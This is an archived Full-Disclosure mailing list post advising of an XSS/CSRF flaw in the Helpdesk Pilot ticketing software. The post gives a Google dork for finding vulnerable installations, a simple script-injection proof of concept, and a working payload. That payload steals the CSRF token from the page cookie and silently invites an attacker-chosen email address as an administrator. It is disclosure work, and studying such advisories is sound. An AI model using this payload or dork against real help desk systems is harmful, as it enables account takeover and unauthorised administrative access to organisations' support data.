lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CABFLu95L3kChENWZxo5M6_mW=A1bb5qk+XVrOVm-=5XE1U2MDw@mail.gmail.com>
Date: Mon, 2 Dec 2013 12:32:11 +0000
From: Ciaran McNally <ciaran.mcnally3@...l.dcu.ie>
To: full-disclosure@...ts.grok.org.uk
Subject: (no subject)

###########################################################

                             Ciaran McNally

Application:     Helpdesk Pilot
                 http://www.helpdeskpilot.com/
Versions:        All versions.
Platforms:       Windows, Mac, Linux
Bug:             XSS/CSRF Add Administrator
Exploitation:    WEB
Date:            30 November 2013.
Author:          Ciaran McNally
Web:             http://makthepla.net/blog/=/helpdesk-pilot-add-admin
My Twitter: https://twitter.com/ciaranmak
Google Dork: intext:"powered by Helpdesk Pilot"

#######################################################################

1) Bug.
2) The exploit.
3) Fix.

###########################################################
Help desk software or your business...
###########################################################

======
1) Bug
======
If attacker can submit a ticket, he/she simply needs to include a malicious
Url within the the ticket.

Javascript injection then occurs via the Url that is incorrectly sanitized.

http://example.com/<script>prompt(1);</script>



###########################################################

===============
2) The "exploit"
===============

For a simple Proof of concept use the example above, you will see the
expected popup within the ticketing system once it's viewed.

To add an administrator use a malicious Url similar to the following...
(Make sure there are no spaces otherwise it won't be parsed correctly)

http://makthepla.net/
<script>$(document).ready(function(){$.ajax({type:"POST",url:"http://
[HOST]/staff/manage/staff/",data:"csrfmiddlewaretoken="+document.cookie.split('=')[1]+"&formtype=invite_staff&staff&first_name&last_name&email=[ATTACKER_MAIL]&bulk_emails&role=1&categories=1",success:function(data){alert("Admin-Added-POC");},error:function(data){alert("POC_FAILED");}})});</script>

where [HOST] is the location of the software
and [ATTACKER_MAIL] is the attacker's email.

Attacker will recieve a mail if it successfully executes to complete
admin addition.

The example above contains alerts simply for POC, this is the one used
in the video on my blog post.



#######################################################################

======
3) Fix
======

Was Reported to the vendors twice,

Fix in progress...

#######################################################################

--
maK :)

-- 
-------------------------------------------
*-maK-*
Redbrick Administrator 2013/2014
Redbrick Webmaster 2012/2013
Redbrick Events Officer 2011/2012

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ